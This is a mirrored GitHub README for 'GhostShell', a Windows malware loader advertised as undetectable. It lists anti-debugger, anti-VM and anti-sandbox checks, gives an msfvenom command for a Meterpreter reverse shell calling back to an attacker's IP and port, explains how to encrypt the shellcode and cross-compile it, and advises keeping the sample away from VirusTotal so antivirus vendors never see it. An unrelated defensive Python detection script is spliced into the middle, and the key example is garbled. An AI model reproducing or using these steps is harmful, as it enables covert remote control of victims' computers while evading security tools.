marciopocebon / ghostshell Goto Github PK

This project forked from jakuta-tech/ghostshell

Undetectable malware, with AV bypass techniques, anti-disassembly, etc.

License: MIT License

C 100.00%

ghostshell's Introduction

GhostShell

This malware uses some techniques to try to bypass AVs, VMs, and sandboxes, with the only purpose of learning more. I'm not responsible for your actions.

Bypass Techniques | Generating the Shellcode | How to compile for Windows on Linux | Credits | License

โš ๏ธ Atention!!!

To check whether the antivirus detects the malware, NEVER send it to VirusTotal: IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN. To analyze it, send it to https://www.hybrid-analysis.com/ and remember to check the option "Do not send my sample to non-affiliated third parties", as in the example below.

💣 Bypass Techniques

Anti-Debugger

To try to bypass debuggers, I'm using IsDebuggerPresent() from the Windows.h header to check whether a debugger is attached to the process.

Anti-VM / Anti-Sandbox / Anti-AV

  • Enumerate Process Function

    Enumerates all processes running on the system and compares each one against the black-list; if any running process matches an entry in the black-list, returns -1 (identified).

  • Sleep Acceleration Check Function

    First gets the current time, sleeps for 2 minutes, then gets the time again and compares the two; if the difference is less than 2, the sleep was shortened and it returns -1 (identified).

  • Mac Address Check Function

    Gets the system's MAC address and compares it to the MACs in the black-list; if it matches any of them, returns -1 (identified).
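From the defender's side, a static triage heuristic for the technique families listed above, added here as an example (this is not code from the GhostShell project). The API names assigned to each family are assumptions, since the README only names IsDebuggerPresent explicitly; the sample import tables are constructed, not real binaries.

```python
"""Static triage heuristic for the evasion families described above.

Added example, not GhostShell code. It scans a byte blob for the Win32 API
names each technique typically imports and reports which families occur
together. A real pipeline would parse the PE import directory instead of
scanning raw bytes, and a packed loader hides these strings entirely.
"""

# Technique family -> API names commonly imported to implement it (assumed).
TECHNIQUE_MARKERS = {
    "anti-debug": [b"IsDebuggerPresent", b"CheckRemoteDebuggerPresent"],
    "process-enum": [b"EnumProcesses", b"CreateToolhelp32Snapshot", b"Process32First"],
    "sleep-acceleration": [b"GetTickCount", b"QueryPerformanceCounter", b"GetSystemTime"],
    "mac-check": [b"GetAdaptersInfo", b"GetAdaptersAddresses"],
}

# A benign program often imports one of these (e.g. a timer), so flag only
# when several families are combined, which is what the README's checks do.
MIN_FAMILIES = 2


def classify(blob: bytes) -> dict:
    """Return {family: [matched API names]} for every family found in blob."""
    found = {}
    for family, names in TECHNIQUE_MARKERS.items():
        hits = [n.decode() for n in names if n in blob]
        if hits:
            found[family] = hits
    return found


def is_suspicious(blob: bytes) -> bool:
    """True when at least MIN_FAMILIES evasion families are present together."""
    return len(classify(blob)) >= MIN_FAMILIES


# Constructed stand-ins for a PE import name table (NUL-separated ASCII
# names, as they appear in .idata); these are not real binaries.
SAMPLE_EVASIVE = (
    b"KERNEL32.dll\x00IsDebuggerPresent\x00Sleep\x00GetTickCount\x00"
    b"PSAPI.DLL\x00EnumProcesses\x00IPHLPAPI.DLL\x00GetAdaptersInfo\x00"
)
SAMPLE_BENIGN = b"KERNEL32.dll\x00CreateFileW\x00WriteFile\x00Sleep\x00GetTickCount\x00"

if __name__ == "__main__":
    for label, blob in (("evasive", SAMPLE_EVASIVE), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious(blob), classify(blob))
```

The benign sample imports a timer API too, which is why the heuristic counts combined families rather than any single marker.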

โ˜ข๏ธ Generating the Shellcode

Generating

To generate the shellcode, type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c, then copy the generated shellcode and encrypt it.

To encrypt the shellcode, use the encrypt_shellcode script.
On Linux, type: ./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
On Windows, type: encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

💻 How to compile for Windows on Linux

To compile for Windows on Linux, first install mingw-w64: sudo apt-get install mingw-w64. Then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static, and for 64 bits: x86_64-w64-mingw32-gcc -o main.exe main.c -l psapi -static

📖 Credits

Credits to https://github.com/rastating; encrypt_shellcode is based on a post on their github.io: https://rastating.github.io/creating-a-shellcode-crypter/

๐Ÿ“ License

This project is under the MIT license. See LICENSE for more information.

> It is not ready yet!

ghostshell's People

Contributors

reddyyz
